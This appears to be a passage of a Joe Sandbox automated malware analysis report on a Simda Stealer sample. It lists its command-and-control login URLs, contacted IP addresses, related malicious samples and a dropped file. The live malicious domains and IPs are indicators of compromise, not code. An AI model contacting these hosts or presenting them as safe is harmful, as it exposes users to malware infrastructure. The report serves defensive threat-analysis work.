                                                                                                                                                                                                              http://lysyvan.com/login.phpsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lykyfen.com/login.phpsvchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533526406.000000000295D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lykywid.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lyvyxyj.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051811464.00000000029FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://qexylup.com/login.phpsvchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2649652867.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://lymyjon.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562152424.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              178.162.217.107
                                                                                                                                                                                                              		gatyfus.comGermany
                                                                                                                                                                                                              		28753LEASEWEB-DE-FRA-10DEfalse
                                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                                              		lygynud.comUnited States
                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                              106.15.232.163
                                                                                                                                                                                                              		unknownChina
                                                                                                                                                                                                              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                              64.190.63.136
                                                                                                                                                                                                              		www.sedoparking.comUnited States
                                                                                                                                                                                                              		11696NBS11696USfalse
                                                                                                                                                                                                              72.52.179.174
                                                                                                                                                                                                              		pltraffic7.comUnited States
                                                                                                                                                                                                              		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                              178.162.203.202
                                                                                                                                                                                                              		unknownGermany
                                                                                                                                                                                                              		28753LEASEWEB-DE-FRA-10DEtrue
                                                                                                                                                                                                              154.85.183.50
                                                                                                                                                                                                              		qegyval.comSeychelles
                                                                                                                                                                                                              		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                                                                                                              64.225.91.73
                                                                                                                                                                                                              		galynuh.comUnited States
                                                                                                                                                                                                              		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                              52.34.198.229
                                                                                                                                                                                                              		lygyvuj.comUnited States
                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                              75.2.71.199
                                                                                                                                                                                                              		puzylyp.comUnited States
                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                              103.150.10.48
                                                                                                                                                                                                              		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                              		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                                                                                                                              199.191.50.83
                                                                                                                                                                                                              		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                              		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                              13.248.169.48
                                                                                                                                                                                                              		pupydeq.comUnited States
                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                              103.224.212.210
                                                                                                                                                                                                              		lyxynyx.comAustralia
                                                                                                                                                                                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                              76.223.67.189
                                                                                                                                                                                                              		qexyhuv.comUnited States
                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                              18.208.156.248
                                                                                                                                                                                                              		pupycag.comUnited States
                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                              208.100.26.245
                                                                                                                                                                                                              		lyvyxor.comUnited States
                                                                                                                                                                                                              		32748STEADFASTUSfalse
                                                                                                                                                                                                              199.59.243.227
                                                                                                                                                                                                              		77026.bodis.comUnited States
                                                                                                                                                                                                              		395082BODIS-NJUSfalse
                                                                                                                                                                                                              103.224.182.252
                                                                                                                                                                                                              		vofycot.comAustralia
                                                                                                                                                                                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                              91.195.240.19
                                                                                                                                                                                                              		parkingpage.namecheap.comGermany
                                                                                                                                                                                                              		47846SEDO-ASDEfalse
                                                                                                                                                                                                              162.255.119.102
                                                                                                                                                                                                              		gahyqah.comUnited States
                                                                                                                                                                                                              		22612NAMECHEAP-NETUSfalse
                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                              		gadyciz.comUnited States
                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                              154.212.231.82
                                                                                                                                                                                                              		gadyniw.comSeychelles
                                                                                                                                                                                                              		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                                              		lysyvan.comEuropean Union
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1553832
                                                                                                                                                                                                              Start date and time:2024-11-11 18:32:12 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 10m 22s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:28
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:13
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:arxtPs1STE.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:ce4b4763d9b269ea600e8fc594781882ca6c8486.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.bank.troj.spyw.expl.evad.winEXE@10/53@2130/24
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                                              • Number of executed functions: 118
                                                                                                                                                                                                              • Number of non-executed functions: 196
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 2.23.209.185, 2.23.209.183, 2.23.209.130, 2.23.209.182, 2.23.209.135, 2.23.209.140, 2.23.209.133, 2.23.209.189, 2.23.209.177, 52.168.117.173, 2.23.209.193, 2.23.209.187, 2.23.209.179, 2.23.209.150, 2.23.209.148, 2.23.209.158, 2.23.209.149, 2.23.209.141, 2.23.209.176, 20.42.73.29
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: arxtPs1STE.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              12:33:48API Interceptor7x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                              12:34:02API Interceptor790934x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              178.162.217.107M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • gatyfus.com/login.php
                                                                                                                                                                                                              http://178.162.217.107Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 178.162.217.107/favicon.ico
                                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • www.kukutrustnet666.info/mrow_nrl/?rnd=1332880156&id=632934364559
                                                                                                                                                                                                              boaqaa.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • kukutrustnet777.info/?2030efb=303793875
                                                                                                                                                                                                              3.94.10.34Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygynud.com/login.php
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygynud.com/login.php
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lygynud.com/login.php
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lymyxid.com/login.php
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • lymyxid.com/login.php
                                                                                                                                                                                                              AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                              • ctdtgwag.biz/wikoehfueo
                                                                                                                                                                                                              E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                              • ctdtgwag.biz/xyrpanl
                                                                                                                                                                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                              • gvijgjwkh.biz/maxlthgls
                                                                                                                                                                                                              AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • ypituyqsq.biz/grbkwbsae
                                                                                                                                                                                                              SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • ctdtgwag.biz/dpaslnrfmhydrsi

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              pupycag.comZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 18.208.156.248
                                                                                                                                                                                                              pupydeq.comZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 13.248.169.48
                                                                                                                                                                                                              lyvyxor.comZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245
                                                                                                                                                                                                              Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 208.100.26.245

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              LEASEWEB-DE-FRA-10DEZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 178.162.203.202
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 178.162.203.211
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 178.162.203.211
                                                                                                                                                                                                              7.exeGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                                                              • 178.162.217.107
                                                                                                                                                                                                              byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                              • 91.109.28.91
                                                                                                                                                                                                              Movavi Slideshow Maker 4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 84.16.252.107
                                                                                                                                                                                                              Movavi Slideshow Maker 4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 84.16.252.107
                                                                                                                                                                                                              https://m-apkpure.playvoir.com/ru/maiorders-merchant/maiorders.merchantappGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 178.162.215.162
                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 84.16.239.119
                                                                                                                                                                                                              transferencia.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 91.109.20.161
                                                                                                                                                                                                              AMAZON-AESUSZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 44.221.84.105
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 44.221.84.105
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 44.221.84.105
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 44.221.84.105
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 44.221.84.105
                                                                                                                                                                                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 44.210.24.233
                                                                                                                                                                                                              Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.144.73.197
                                                                                                                                                                                                              http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 52.2.182.50
                                                                                                                                                                                                              Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 23.22.254.206
                                                                                                                                                                                                              90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                              • 3.5.11.187
                                                                                                                                                                                                              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdZ8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 106.15.232.163
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 106.15.232.163
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 106.15.232.163
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 106.15.232.163
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 106.15.232.163
                                                                                                                                                                                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 120.79.48.98
                                                                                                                                                                                                              sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 8.188.166.167
                                                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 47.93.221.102
                                                                                                                                                                                                              C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 118.31.219.198
                                                                                                                                                                                                              Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 118.31.219.198

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199
                                                                                                                                                                                                              Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                                              • 75.2.71.199

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                              C:\Program Files (x86)\Windows Defender\gahyqah.com

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24656
                                                                                                                                                                                                              Entropy (8bit):7.9821326567077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:P0YZ3Jjaxk9sU4B5xLlrzEoqtll4DksQ7vVQE8aP4aujgJYBY1qM8VOcBEt:dZ3VGB5h6zSDkj7v79QaigJQsfcc
